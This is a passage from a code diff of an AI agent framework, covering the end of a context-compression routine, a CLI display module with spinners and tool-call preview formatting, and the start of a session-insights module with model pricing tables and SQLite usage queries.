if not self.quiet_mode:
print(f"⚠️ Cannot compress: only {n_messages} messages (need > {self.protect_first_n + self.protect_last_n + 1})")
return messages
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages
# Adjust boundaries to avoid splitting tool_call/result groups.
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages
turns_to_summarize = messages[compress_start:compress_end]
display_tokens = current_tokens if current_tokens else self.last_prompt_tokens or estimate_messages_tokens_rough(messages)
if not self.quiet_mode:
print(f"\n📦 Context compression triggered ({display_tokens:,} tokens ≥ {self.threshold_tokens:,} threshold)")
print(f" 📊 Model context limit: {self.context_length:,} tokens ({self.threshold_percent*100:.0f}% = {self.threshold_tokens:,})")
if not self.quiet_mode:
print(f" 🗜️ Summarizing turns {compress_start+1}-{compress_end} ({len(turns_to_summarize)} turns)")
summary = self._generate_summary(turns_to_summarize)
compressed = []
for i in range(compress_start):
msg = messages[i].copy()
if i == 0 and msg.get("role") == "system" and self.compression_count == 0:
msg["content"] = (msg.get("content") or "") + "\n\n[Note: Some earlier conversation turns may be summarized to preserve context space.]"
compressed.append(msg)
if summary:
last_head_role = messages[compress_start - 1].get("role", "user") if compress_start > 0 else "user"
summary_role = "user" if last_head_role in ("assistant", "tool") else "assistant"
compressed.append({"role": summary_role, "content": summary})
else:
if not self.quiet_mode:
print(" ⚠️ No summary model available — middle turns dropped without summary")
for i in range(compress_end, n_messages):
compressed.append(messages[i].copy())
self.compression_count += 1
compressed = self._sanitize_tool_pairs(compressed)
if not self.quiet_mode:
new_estimate = estimate_messages_tokens_rough(compressed)
saved_estimate = display_tokens - new_estimate
print(f" ✅ Compressed: {n_messages}{len(compressed)} messages (~{saved_estimate:,} tokens saved)")
print(f" 💡 Compression #{self.compression_count} complete")
return compressed

523
agent/display.py Normal file
View File

@@ -0,0 +1,523 @@
"""CLI presentation -- spinner, kawaii faces, tool preview formatting.
Pure display functions and classes with no AIAgent dependency.
Used by AIAgent._execute_tool_calls for CLI feedback.
"""
import json
import os
import random
import sys
import threading
import time
# ANSI escape codes for coloring tool failure indicators
_RED = "\033[31m"
_RESET = "\033[0m"
# =========================================================================
# Skin-aware helpers (lazy import to avoid circular deps)
# =========================================================================
def _get_skin():
"""Get the active skin config, or None if not available."""
try:
from hermes_cli.skin_engine import get_active_skin
return get_active_skin()
except Exception:
return None
def get_skin_faces(key: str, default: list) -> list:
"""Get spinner face list from active skin, falling back to default."""
skin = _get_skin()
if skin:
faces = skin.get_spinner_list(key)
if faces:
return faces
return default
def get_skin_verbs() -> list:
"""Get thinking verbs from active skin."""
skin = _get_skin()
if skin:
verbs = skin.get_spinner_list("thinking_verbs")
if verbs:
return verbs
return KawaiiSpinner.THINKING_VERBS
def get_skin_tool_prefix() -> str:
"""Get tool output prefix character from active skin."""
skin = _get_skin()
if skin:
return skin.tool_prefix
return ""
# =========================================================================
# Tool preview (one-line summary of a tool call's primary argument)
# =========================================================================
def build_tool_preview(tool_name: str, args: dict, max_len: int = 40) -> str:
"""Build a short preview of a tool call's primary argument for display."""
if not args:
return None
primary_args = {
"terminal": "command", "web_search": "query", "web_extract": "urls",
"read_file": "path", "write_file": "path", "patch": "path",
"search_files": "pattern", "browser_navigate": "url",
"browser_click": "ref", "browser_type": "text",
"image_generate": "prompt", "text_to_speech": "text",
"vision_analyze": "question", "mixture_of_agents": "user_prompt",
"skill_view": "name", "skills_list": "category",
"schedule_cronjob": "name",
"execute_code": "code", "delegate_task": "goal",
"clarify": "question", "skill_manage": "name",
}
if tool_name == "process":
action = args.get("action", "")
sid = args.get("session_id", "")
data = args.get("data", "")
timeout_val = args.get("timeout")
parts = [action]
if sid:
parts.append(sid[:16])
if data:
parts.append(f'"{data[:20]}"')
if timeout_val and action == "wait":
parts.append(f"{timeout_val}s")
return " ".join(parts) if parts else None
if tool_name == "todo":
todos_arg = args.get("todos")
merge = args.get("merge", False)
if todos_arg is None:
return "reading task list"
elif merge:
return f"updating {len(todos_arg)} task(s)"
else:
return f"planning {len(todos_arg)} task(s)"
if tool_name == "session_search":
query = args.get("query", "")
return f"recall: \"{query[:25]}{'...' if len(query) > 25 else ''}\""
if tool_name == "memory":
action = args.get("action", "")
target = args.get("target", "")
if action == "add":
content = args.get("content", "")
return f"+{target}: \"{content[:25]}{'...' if len(content) > 25 else ''}\""
elif action == "replace":
return f"~{target}: \"{args.get('old_text', '')[:20]}\""
elif action == "remove":
return f"-{target}: \"{args.get('old_text', '')[:20]}\""
return action
if tool_name == "send_message":
target = args.get("target", "?")
msg = args.get("message", "")
if len(msg) > 20:
msg = msg[:17] + "..."
return f"to {target}: \"{msg}\""
if tool_name.startswith("rl_"):
rl_previews = {
"rl_list_environments": "listing envs",
"rl_select_environment": args.get("name", ""),
"rl_get_current_config": "reading config",
"rl_edit_config": f"{args.get('field', '')}={args.get('value', '')}",
"rl_start_training": "starting",
"rl_check_status": args.get("run_id", "")[:16],
"rl_stop_training": f"stopping {args.get('run_id', '')[:16]}",
"rl_get_results": args.get("run_id", "")[:16],
"rl_list_runs": "listing runs",
"rl_test_inference": f"{args.get('num_steps', 3)} steps",
}
return rl_previews.get(tool_name)
key = primary_args.get(tool_name)
if not key:
for fallback_key in ("query", "text", "command", "path", "name", "prompt", "code", "goal"):
if fallback_key in args:
key = fallback_key
break
if not key or key not in args:
return None
value = args[key]
if isinstance(value, list):
value = value[0] if value else ""
preview = str(value).strip()
if not preview:
return None
if len(preview) > max_len:
preview = preview[:max_len - 3] + "..."
return preview
# =========================================================================
# KawaiiSpinner
# =========================================================================
class KawaiiSpinner:
"""Animated spinner with kawaii faces for CLI feedback during tool execution."""
SPINNERS = {
'dots': ['', '', '', '', '', '', '', '', '', ''],
'bounce': ['', '', '', '', '', '', '', ''],
'grow': ['', '', '', '', '', '', '', '', '', '', '', '', '', ''],
'arrows': ['', '', '', '', '', '', '', ''],
'star': ['', '', '', '', '', '', '', ''],
'moon': ['🌑', '🌒', '🌓', '🌔', '🌕', '🌖', '🌗', '🌘'],
'pulse': ['', '', '', '', '', ''],
'brain': ['🧠', '💭', '💡', '', '💫', '🌟', '💡', '💭'],
'sparkle': ['', '˚', '*', '', '', '', '*', '˚'],
}
KAWAII_WAITING = [
"(。◕‿◕。)", "(◕‿◕✿)", "٩(◕‿◕。)۶", "(✿◠‿◠)", "( ˘▽˘)っ",
"♪(´ε` )", "(◕ᴗ◕✿)", "ヾ(^∇^)", "(≧◡≦)", "(★ω★)",
]
KAWAII_THINKING = [
"(。•́︿•̀。)", "(◔_◔)", "(¬‿¬)", "( •_•)>⌐■-■", "(⌐■_■)",
"(´・_・`)", "◉_◉", "(°ロ°)", "( ˘⌣˘)♡", "ヽ(>∀<☆)☆",
"٩(๑❛ᴗ❛๑)۶", "(⊙_⊙)", "(¬_¬)", "( ͡° ͜ʖ ͡°)", "ಠ_ಠ",
]
THINKING_VERBS = [
"pondering", "contemplating", "musing", "cogitating", "ruminating",
"deliberating", "mulling", "reflecting", "processing", "reasoning",
"analyzing", "computing", "synthesizing", "formulating", "brainstorming",
]
def __init__(self, message: str = "", spinner_type: str = 'dots'):
self.message = message
self.spinner_frames = self.SPINNERS.get(spinner_type, self.SPINNERS['dots'])
self.running = False
self.thread = None
self.frame_idx = 0
self.start_time = None
self.last_line_len = 0
# Capture stdout NOW, before any redirect_stdout(devnull) from
# child agents can replace sys.stdout with a black hole.
self._out = sys.stdout
def _write(self, text: str, end: str = '\n', flush: bool = False):
"""Write to the stdout captured at spinner creation time."""
try:
self._out.write(text + end)
if flush:
self._out.flush()
except (ValueError, OSError):
pass
def _animate(self):
# Cache skin wings at start (avoid per-frame imports)
skin = _get_skin()
wings = skin.get_spinner_wings() if skin else []
while self.running:
if os.getenv("HERMES_SPINNER_PAUSE"):
time.sleep(0.1)
continue
frame = self.spinner_frames[self.frame_idx % len(self.spinner_frames)]
elapsed = time.time() - self.start_time
if wings:
left, right = wings[self.frame_idx % len(wings)]
line = f" {left} {frame} {self.message} {right} ({elapsed:.1f}s)"
else:
line = f" {frame} {self.message} ({elapsed:.1f}s)"
pad = max(self.last_line_len - len(line), 0)
self._write(f"\r{line}{' ' * pad}", end='', flush=True)
self.last_line_len = len(line)
self.frame_idx += 1
time.sleep(0.12)
def start(self):
if self.running:
return
self.running = True
self.start_time = time.time()
self.thread = threading.Thread(target=self._animate, daemon=True)
self.thread.start()
def update_text(self, new_message: str):
self.message = new_message
def print_above(self, text: str):
"""Print a line above the spinner without disrupting animation.
Clears the current spinner line, prints the text, and lets the
next animation tick redraw the spinner on the line below.
Thread-safe: uses the captured stdout reference (self._out).
Works inside redirect_stdout(devnull) because _write bypasses
sys.stdout and writes to the stdout captured at spinner creation.
"""
if not self.running:
self._write(f" {text}", flush=True)
return
# Clear spinner line with spaces (not \033[K) to avoid garbled escape
# codes when prompt_toolkit's patch_stdout is active — same approach
# as stop(). Then print text; spinner redraws on next tick.
blanks = ' ' * max(self.last_line_len + 5, 40)
self._write(f"\r{blanks}\r {text}", flush=True)
def stop(self, final_message: str = None):
self.running = False
if self.thread:
self.thread.join(timeout=0.5)
# Clear the spinner line with spaces instead of \033[K to avoid
# garbled escape codes when prompt_toolkit's patch_stdout is active.
blanks = ' ' * max(self.last_line_len + 5, 40)
self._write(f"\r{blanks}\r", end='', flush=True)
if final_message:
self._write(f" {final_message}", flush=True)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
return False
# =========================================================================
# Kawaii face arrays (used by AIAgent._execute_tool_calls for spinner text)
# =========================================================================
KAWAII_SEARCH = [
"♪(´ε` )", "(。◕‿◕。)", "ヾ(^∇^)", "(◕ᴗ◕✿)", "( ˘▽˘)っ",
"٩(◕‿◕。)۶", "(✿◠‿◠)", "♪~(´ε` )", "(ノ´ヮ`)*:・゚✧", "(◎o◎)",
]
KAWAII_READ = [
"φ(゜▽゜*)♪", "( ˘▽˘)っ", "(⌐■_■)", "٩(。•́‿•̀。)۶", "(◕‿◕✿)",
"ヾ(@⌒ー⌒@)", "(✧ω✧)", "♪(๑ᴖ◡ᴖ๑)♪", "(≧◡≦)", "( ´ ▽ ` )",
]
KAWAII_TERMINAL = [
"ヽ(>∀<☆)", "(ノ°∀°)", "٩(^ᴗ^)۶", "ヾ(⌐■_■)ノ♪", "(•̀ᴗ•́)و",
"┗(0)┓", "(`・ω・´)", "( ̄▽ ̄)", "(ง •̀_•́)ง", "ヽ(´▽`)/",
]
KAWAII_BROWSER = [
"(ノ°∀°)", "(☞゚ヮ゚)☞", "( ͡° ͜ʖ ͡°)", "┌( ಠ_ಠ)┘", "(⊙_⊙)",
"ヾ(•ω•`)o", "( ̄ω ̄)", "( ˇωˇ )", "(ᵔᴥᵔ)", "(◎o◎)",
]
KAWAII_CREATE = [
"✧*。٩(ˊᗜˋ*)و✧", "(ノ◕ヮ◕)ノ*:・゚✧", "ヽ(>∀<☆)", "٩(♡ε♡)۶", "(◕‿◕)♡",
"✿◕ ‿ ◕✿", "(*≧▽≦)", "ヾ(-)", "(☆▽☆)", "°˖✧◝(⁰▿⁰)◜✧˖°",
]
KAWAII_SKILL = [
"ヾ(@⌒ー⌒@)", "(๑˃ᴗ˂)ﻭ", "٩(◕‿◕。)۶", "(✿╹◡╹)", "ヽ(・∀・)",
"(ノ´ヮ`)*:・゚✧", "♪(๑ᴖ◡ᴖ๑)♪", "(◠‿◠)", "٩(ˊᗜˋ*)و", "(^▽^)",
"ヾ(^∇^)", "(★ω★)/", "٩(。•́‿•̀。)۶", "(◕ᴗ◕✿)", "(◎o◎)",
"(✧ω✧)", "ヽ(>∀<☆)", "( ˘▽˘)っ", "(≧◡≦) ♡", "ヾ( ̄▽ ̄)",
]
KAWAII_THINK = [
"(っ°Д°;)っ", "(;′⌒`)", "(・_・ヾ", "( ´_ゝ`)", "( ̄ヘ ̄)",
"(。-`ω´-)", "( ˘︹˘ )", "(¬_¬)", "ヽ(ー_ー )", "(一_一)",
]
KAWAII_GENERIC = [
"♪(´ε` )", "(◕‿◕✿)", "ヾ(^∇^)", "٩(◕‿◕。)۶", "(✿◠‿◠)",
"(ノ´ヮ`)*:・゚✧", "ヽ(>∀<☆)", "(☆▽☆)", "( ˘▽˘)っ", "(≧◡≦)",
]
# =========================================================================
# Cute tool message (completion line that replaces the spinner)
# =========================================================================
def _detect_tool_failure(tool_name: str, result: str | None) -> tuple[bool, str]:
"""Inspect a tool result string for signs of failure.
Returns ``(is_failure, suffix)`` where *suffix* is an informational tag
like ``" [exit 1]"`` for terminal failures, or ``" [error]"`` for generic
failures. On success, returns ``(False, "")``.
"""
if result is None:
return False, ""
if tool_name == "terminal":
try:
data = json.loads(result)
exit_code = data.get("exit_code")
if exit_code is not None and exit_code != 0:
return True, f" [exit {exit_code}]"
except (json.JSONDecodeError, TypeError, AttributeError):
pass
return False, ""
# Memory-specific: distinguish "full" from real errors
if tool_name == "memory":
try:
data = json.loads(result)
if data.get("success") is False and "exceed the limit" in data.get("error", ""):
return True, " [full]"
except (json.JSONDecodeError, TypeError, AttributeError):
pass
# Generic heuristic for non-terminal tools
lower = result[:500].lower()
if '"error"' in lower or '"failed"' in lower or result.startswith("Error"):
return True, " [error]"
return False, ""
def get_cute_tool_message(
tool_name: str, args: dict, duration: float, result: str | None = None,
) -> str:
"""Generate a formatted tool completion line for CLI quiet mode.
Format: ``| {emoji} {verb:9} {detail} {duration}``
When *result* is provided the line is checked for failure indicators.
Failed tool calls get a red prefix and an informational suffix.
"""
dur = f"{duration:.1f}s"
is_failure, failure_suffix = _detect_tool_failure(tool_name, result)
skin_prefix = get_skin_tool_prefix()
def _trunc(s, n=40):
s = str(s)
return (s[:n-3] + "...") if len(s) > n else s
def _path(p, n=35):
p = str(p)
return ("..." + p[-(n-3):]) if len(p) > n else p
def _wrap(line: str) -> str:
"""Apply skin tool prefix and failure suffix."""
if skin_prefix != "":
line = line.replace("", skin_prefix, 1)
if not is_failure:
return line
return f"{line}{failure_suffix}"
if tool_name == "web_search":
return _wrap(f"┊ 🔍 search {_trunc(args.get('query', ''), 42)} {dur}")
if tool_name == "web_extract":
urls = args.get("urls", [])
if urls:
url = urls[0] if isinstance(urls, list) else str(urls)
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
extra = f" +{len(urls)-1}" if len(urls) > 1 else ""
return _wrap(f"┊ 📄 fetch {_trunc(domain, 35)}{extra} {dur}")
return _wrap(f"┊ 📄 fetch pages {dur}")
if tool_name == "web_crawl":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🕸️ crawl {_trunc(domain, 35)} {dur}")
if tool_name == "terminal":
return _wrap(f"┊ 💻 $ {_trunc(args.get('command', ''), 42)} {dur}")
if tool_name == "process":
action = args.get("action", "?")
sid = args.get("session_id", "")[:12]
labels = {"list": "ls processes", "poll": f"poll {sid}", "log": f"log {sid}",
"wait": f"wait {sid}", "kill": f"kill {sid}", "write": f"write {sid}", "submit": f"submit {sid}"}
return _wrap(f"┊ ⚙️ proc {labels.get(action, f'{action} {sid}')} {dur}")
if tool_name == "read_file":
return _wrap(f"┊ 📖 read {_path(args.get('path', ''))} {dur}")
if tool_name == "write_file":
return _wrap(f"┊ ✍️ write {_path(args.get('path', ''))} {dur}")
if tool_name == "patch":
return _wrap(f"┊ 🔧 patch {_path(args.get('path', ''))} {dur}")
if tool_name == "search_files":
pattern = _trunc(args.get("pattern", ""), 35)
target = args.get("target", "content")
verb = "find" if target == "files" else "grep"
return _wrap(f"┊ 🔎 {verb:9} {pattern} {dur}")
if tool_name == "browser_navigate":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🌐 navigate {_trunc(domain, 35)} {dur}")
if tool_name == "browser_snapshot":
mode = "full" if args.get("full") else "compact"
return _wrap(f"┊ 📸 snapshot {mode} {dur}")
if tool_name == "browser_click":
return _wrap(f"┊ 👆 click {args.get('ref', '?')} {dur}")
if tool_name == "browser_type":
return _wrap(f"┊ ⌨️ type \"{_trunc(args.get('text', ''), 30)}\" {dur}")
if tool_name == "browser_scroll":
d = args.get("direction", "down")
arrow = {"down": "", "up": "", "right": "", "left": ""}.get(d, "")
return _wrap(f"{arrow} scroll {d} {dur}")
if tool_name == "browser_back":
return _wrap(f"┊ ◀️ back {dur}")
if tool_name == "browser_press":
return _wrap(f"┊ ⌨️ press {args.get('key', '?')} {dur}")
if tool_name == "browser_close":
return _wrap(f"┊ 🚪 close browser {dur}")
if tool_name == "browser_get_images":
return _wrap(f"┊ 🖼️ images extracting {dur}")
if tool_name == "browser_vision":
return _wrap(f"┊ 👁️ vision analyzing page {dur}")
if tool_name == "todo":
todos_arg = args.get("todos")
merge = args.get("merge", False)
if todos_arg is None:
return _wrap(f"┊ 📋 plan reading tasks {dur}")
elif merge:
return _wrap(f"┊ 📋 plan update {len(todos_arg)} task(s) {dur}")
else:
return _wrap(f"┊ 📋 plan {len(todos_arg)} task(s) {dur}")
if tool_name == "session_search":
return _wrap(f"┊ 🔍 recall \"{_trunc(args.get('query', ''), 35)}\" {dur}")
if tool_name == "memory":
action = args.get("action", "?")
target = args.get("target", "")
if action == "add":
return _wrap(f"┊ 🧠 memory +{target}: \"{_trunc(args.get('content', ''), 30)}\" {dur}")
elif action == "replace":
return _wrap(f"┊ 🧠 memory ~{target}: \"{_trunc(args.get('old_text', ''), 20)}\" {dur}")
elif action == "remove":
return _wrap(f"┊ 🧠 memory -{target}: \"{_trunc(args.get('old_text', ''), 20)}\" {dur}")
return _wrap(f"┊ 🧠 memory {action} {dur}")
if tool_name == "skills_list":
return _wrap(f"┊ 📚 skills list {args.get('category', 'all')} {dur}")
if tool_name == "skill_view":
return _wrap(f"┊ 📚 skill {_trunc(args.get('name', ''), 30)} {dur}")
if tool_name == "image_generate":
return _wrap(f"┊ 🎨 create {_trunc(args.get('prompt', ''), 35)} {dur}")
if tool_name == "text_to_speech":
return _wrap(f"┊ 🔊 speak {_trunc(args.get('text', ''), 30)} {dur}")
if tool_name == "vision_analyze":
return _wrap(f"┊ 👁️ vision {_trunc(args.get('question', ''), 30)} {dur}")
if tool_name == "mixture_of_agents":
return _wrap(f"┊ 🧠 reason {_trunc(args.get('user_prompt', ''), 30)} {dur}")
if tool_name == "send_message":
return _wrap(f"┊ 📨 send {args.get('target', '?')}: \"{_trunc(args.get('message', ''), 25)}\" {dur}")
if tool_name == "schedule_cronjob":
return _wrap(f"┊ ⏰ schedule {_trunc(args.get('name', args.get('prompt', 'task')), 30)} {dur}")
if tool_name == "list_cronjobs":
return _wrap(f"┊ ⏰ jobs listing {dur}")
if tool_name == "remove_cronjob":
return _wrap(f"┊ ⏰ remove job {args.get('job_id', '?')} {dur}")
if tool_name.startswith("rl_"):
rl = {
"rl_list_environments": "list envs", "rl_select_environment": f"select {args.get('name', '')}",
"rl_get_current_config": "get config", "rl_edit_config": f"set {args.get('field', '?')}",
"rl_start_training": "start training", "rl_check_status": f"status {args.get('run_id', '?')[:12]}",
"rl_stop_training": f"stop {args.get('run_id', '?')[:12]}", "rl_get_results": f"results {args.get('run_id', '?')[:12]}",
"rl_list_runs": "list runs", "rl_test_inference": "test inference",
}
return _wrap(f"┊ 🧪 rl {rl.get(tool_name, tool_name.replace('rl_', ''))} {dur}")
if tool_name == "execute_code":
code = args.get("code", "")
first_line = code.strip().split("\n")[0] if code.strip() else ""
return _wrap(f"┊ 🐍 exec {_trunc(first_line, 35)} {dur}")
if tool_name == "delegate_task":
tasks = args.get("tasks")
if tasks and isinstance(tasks, list):
return _wrap(f"┊ 🔀 delegate {len(tasks)} parallel tasks {dur}")
return _wrap(f"┊ 🔀 delegate {_trunc(args.get('goal', ''), 35)} {dur}")
preview = build_tool_preview(tool_name, args) or ""
return _wrap(f"┊ ⚡ {tool_name[:9]:9} {_trunc(preview, 35)} {dur}")

818
agent/insights.py Normal file
View File

@@ -0,0 +1,818 @@
"""
Session Insights Engine for Hermes Agent.
Analyzes historical session data from the SQLite state database to produce
comprehensive usage insights — token consumption, cost estimates, tool usage
patterns, activity trends, model/platform breakdowns, and session metrics.
Inspired by Claude Code's /insights command, adapted for Hermes Agent's
multi-platform architecture with additional cost estimation and platform
breakdown capabilities.
Usage:
from agent.insights import InsightsEngine
engine = InsightsEngine(db)
report = engine.generate(days=30)
print(engine.format_terminal(report))
"""
import json
import time
from collections import Counter, defaultdict
from datetime import datetime
from typing import Any, Dict, List, Optional
# =========================================================================
# Model pricing (USD per million tokens) — approximate as of early 2026
# =========================================================================
MODEL_PRICING = {
# OpenAI
"gpt-4o": {"input": 2.50, "output": 10.00},
"gpt-4o-mini": {"input": 0.15, "output": 0.60},
"gpt-4.1": {"input": 2.00, "output": 8.00},
"gpt-4.1-mini": {"input": 0.40, "output": 1.60},
"gpt-4.1-nano": {"input": 0.10, "output": 0.40},
"gpt-4.5-preview": {"input": 75.00, "output": 150.00},
"gpt-5": {"input": 10.00, "output": 30.00},
"gpt-5.4": {"input": 10.00, "output": 30.00},
"o3": {"input": 10.00, "output": 40.00},
"o3-mini": {"input": 1.10, "output": 4.40},
"o4-mini": {"input": 1.10, "output": 4.40},
# Anthropic
"claude-opus-4-20250514": {"input": 15.00, "output": 75.00},
"claude-sonnet-4-20250514": {"input": 3.00, "output": 15.00},
"claude-3-5-sonnet-20241022": {"input": 3.00, "output": 15.00},
"claude-3-5-haiku-20241022": {"input": 0.80, "output": 4.00},
"claude-3-opus-20240229": {"input": 15.00, "output": 75.00},
"claude-3-haiku-20240307": {"input": 0.25, "output": 1.25},
# DeepSeek
"deepseek-chat": {"input": 0.14, "output": 0.28},
"deepseek-reasoner": {"input": 0.55, "output": 2.19},
# Google
"gemini-2.5-pro": {"input": 1.25, "output": 10.00},
"gemini-2.5-flash": {"input": 0.15, "output": 0.60},
"gemini-2.0-flash": {"input": 0.10, "output": 0.40},
# Meta (via providers)
"llama-4-maverick": {"input": 0.50, "output": 0.70},
"llama-4-scout": {"input": 0.20, "output": 0.30},
# Z.AI / GLM (direct provider — pricing not published externally, treat as local)
"glm-5": {"input": 0.0, "output": 0.0},
"glm-4.7": {"input": 0.0, "output": 0.0},
"glm-4.5": {"input": 0.0, "output": 0.0},
"glm-4.5-flash": {"input": 0.0, "output": 0.0},
# Kimi / Moonshot (direct provider — pricing not published externally, treat as local)
"kimi-k2.5": {"input": 0.0, "output": 0.0},
"kimi-k2-thinking": {"input": 0.0, "output": 0.0},
"kimi-k2-turbo-preview": {"input": 0.0, "output": 0.0},
"kimi-k2-0905-preview": {"input": 0.0, "output": 0.0},
# MiniMax (direct provider — pricing not published externally, treat as local)
"MiniMax-M2.5": {"input": 0.0, "output": 0.0},
"MiniMax-M2.5-highspeed": {"input": 0.0, "output": 0.0},
"MiniMax-M2.1": {"input": 0.0, "output": 0.0},
}
# Fallback: unknown/custom models get zero cost (we can't assume pricing
# for self-hosted models, custom OAI endpoints, local inference, etc.)
_DEFAULT_PRICING = {"input": 0.0, "output": 0.0}
def _has_known_pricing(model_name: str) -> bool:
"""Check if a model has known pricing (vs unknown/custom endpoint)."""
return _get_pricing(model_name) is not _DEFAULT_PRICING
def _get_pricing(model_name: str) -> Dict[str, float]:
"""Look up pricing for a model. Uses fuzzy matching on model name.
Returns _DEFAULT_PRICING (zero cost) for unknown/custom models —
we can't assume costs for self-hosted endpoints, local inference, etc.
"""
if not model_name:
return _DEFAULT_PRICING
# Strip provider prefix (e.g., "anthropic/claude-..." -> "claude-...")
bare = model_name.split("/")[-1].lower()
# Exact match first
if bare in MODEL_PRICING:
return MODEL_PRICING[bare]
# Fuzzy prefix match — prefer the LONGEST matching key to avoid
# e.g. "gpt-4o" matching before "gpt-4o-mini" for "gpt-4o-mini-2024-07-18"
best_match = None
best_len = 0
for key, price in MODEL_PRICING.items():
if bare.startswith(key) and len(key) > best_len:
best_match = price
best_len = len(key)
if best_match:
return best_match
# Keyword heuristics (checked in most-specific-first order)
if "opus" in bare:
return {"input": 15.00, "output": 75.00}
if "sonnet" in bare:
return {"input": 3.00, "output": 15.00}
if "haiku" in bare:
return {"input": 0.80, "output": 4.00}
if "gpt-4o-mini" in bare:
return {"input": 0.15, "output": 0.60}
if "gpt-4o" in bare:
return {"input": 2.50, "output": 10.00}
if "gpt-5" in bare:
return {"input": 10.00, "output": 30.00}
if "deepseek" in bare:
return {"input": 0.14, "output": 0.28}
if "gemini" in bare:
return {"input": 0.15, "output": 0.60}
return _DEFAULT_PRICING
def _estimate_cost(model: str, input_tokens: int, output_tokens: int) -> float:
"""Estimate the USD cost for a given model and token counts."""
pricing = _get_pricing(model)
return (input_tokens * pricing["input"] + output_tokens * pricing["output"]) / 1_000_000
def _format_duration(seconds: float) -> str:
"""Format seconds into a human-readable duration string."""
if seconds < 60:
return f"{seconds:.0f}s"
minutes = seconds / 60
if minutes < 60:
return f"{minutes:.0f}m"
hours = minutes / 60
if hours < 24:
remaining_min = int(minutes % 60)
return f"{int(hours)}h {remaining_min}m" if remaining_min else f"{int(hours)}h"
days = hours / 24
return f"{days:.1f}d"
def _bar_chart(values: List[int], max_width: int = 20) -> List[str]:
"""Create simple horizontal bar chart strings from values."""
peak = max(values) if values else 1
if peak == 0:
return ["" for _ in values]
return ["" * max(1, int(v / peak * max_width)) if v > 0 else "" for v in values]
class InsightsEngine:
"""
Analyzes session history and produces usage insights.
Works directly with a SessionDB instance (or raw sqlite3 connection)
to query session and message data.
"""
def __init__(self, db):
"""
Initialize with a SessionDB instance.
Args:
db: A SessionDB instance (from hermes_state.py)
"""
self.db = db
self._conn = db._conn
def generate(self, days: int = 30, source: str = None) -> Dict[str, Any]:
"""
Generate a complete insights report.
Args:
days: Number of days to look back (default: 30)
source: Optional filter by source platform
Returns:
Dict with all computed insights
"""
cutoff = time.time() - (days * 86400)
# Gather raw data
sessions = self._get_sessions(cutoff, source)
tool_usage = self._get_tool_usage(cutoff, source)
message_stats = self._get_message_stats(cutoff, source)
if not sessions:
return {
"days": days,
"source_filter": source,
"empty": True,
"overview": {},
"models": [],
"platforms": [],
"tools": [],
"activity": {},
"top_sessions": [],
}
# Compute insights
overview = self._compute_overview(sessions, message_stats)
models = self._compute_model_breakdown(sessions)
platforms = self._compute_platform_breakdown(sessions)
tools = self._compute_tool_breakdown(tool_usage)
activity = self._compute_activity_patterns(sessions)
top_sessions = self._compute_top_sessions(sessions)
return {
"days": days,
"source_filter": source,
"empty": False,
"generated_at": time.time(),
"overview": overview,
"models": models,
"platforms": platforms,
"tools": tools,
"activity": activity,
"top_sessions": top_sessions,
}
# =========================================================================
# Data gathering (SQL queries)
# =========================================================================
# Columns we actually need (skip system_prompt, model_config blobs)
_SESSION_COLS = ("id, source, model, started_at, ended_at, "
"message_count, tool_call_count, input_tokens, output_tokens")
def _get_sessions(self, cutoff: float, source: str = None) -> List[Dict]:
"""Fetch sessions within the time window."""
if source:
cursor = self._conn.execute(
f"""SELECT {self._SESSION_COLS} FROM sessions
WHERE started_at >= ? AND source = ?
ORDER BY started_at DESC""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
f"""SELECT {self._SESSION_COLS} FROM sessions
WHERE started_at >= ?
ORDER BY started_at DESC""",
(cutoff,),
)
return [dict(row) for row in cursor.fetchall()]
def _get_tool_usage(self, cutoff: float, source: str = None) -> List[Dict]:
"""Get tool call counts from messages.
Uses two sources:
1. tool_name column on 'tool' role messages (set by gateway)
2. tool_calls JSON on 'assistant' role messages (covers CLI where
tool_name is not populated on tool responses)
"""
tool_counts = Counter()
# Source 1: explicit tool_name on tool response messages
if source:
cursor = self._conn.execute(
"""SELECT m.tool_name, COUNT(*) as count
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?
AND m.role = 'tool' AND m.tool_name IS NOT NULL
GROUP BY m.tool_name
ORDER BY count DESC""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
"""SELECT m.tool_name, COUNT(*) as count
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?
AND m.role = 'tool' AND m.tool_name IS NOT NULL
GROUP BY m.tool_name
ORDER BY count DESC""",
(cutoff,),
)
for row in cursor.fetchall():
tool_counts[row["tool_name"]] += row["count"]
# Source 2: extract from tool_calls JSON on assistant messages
# (covers CLI sessions where tool_name is NULL on tool responses)
if source:
cursor2 = self._conn.execute(
"""SELECT m.tool_calls
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?
AND m.role = 'assistant' AND m.tool_calls IS NOT NULL""",
(cutoff, source),
)
else:
cursor2 = self._conn.execute(
"""SELECT m.tool_calls
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?
AND m.role = 'assistant' AND m.tool_calls IS NOT NULL""",
(cutoff,),
)
tool_calls_counts = Counter()
for row in cursor2.fetchall():
try:
calls = row["tool_calls"]
if isinstance(calls, str):
calls = json.loads(calls)
if isinstance(calls, list):
for call in calls:
func = call.get("function", {}) if isinstance(call, dict) else {}
name = func.get("name")
if name:
tool_calls_counts[name] += 1
except (json.JSONDecodeError, TypeError, AttributeError):
continue
# Merge: prefer tool_name source, supplement with tool_calls source
# for tools not already counted
if not tool_counts and tool_calls_counts:
# No tool_name data at all — use tool_calls exclusively
tool_counts = tool_calls_counts
elif tool_counts and tool_calls_counts:
# Both sources have data — use whichever has the higher count per tool
# (they may overlap, so take the max to avoid double-counting)
all_tools = set(tool_counts) | set(tool_calls_counts)
merged = Counter()
for tool in all_tools:
merged[tool] = max(tool_counts.get(tool, 0), tool_calls_counts.get(tool, 0))
tool_counts = merged
# Convert to the expected format
return [
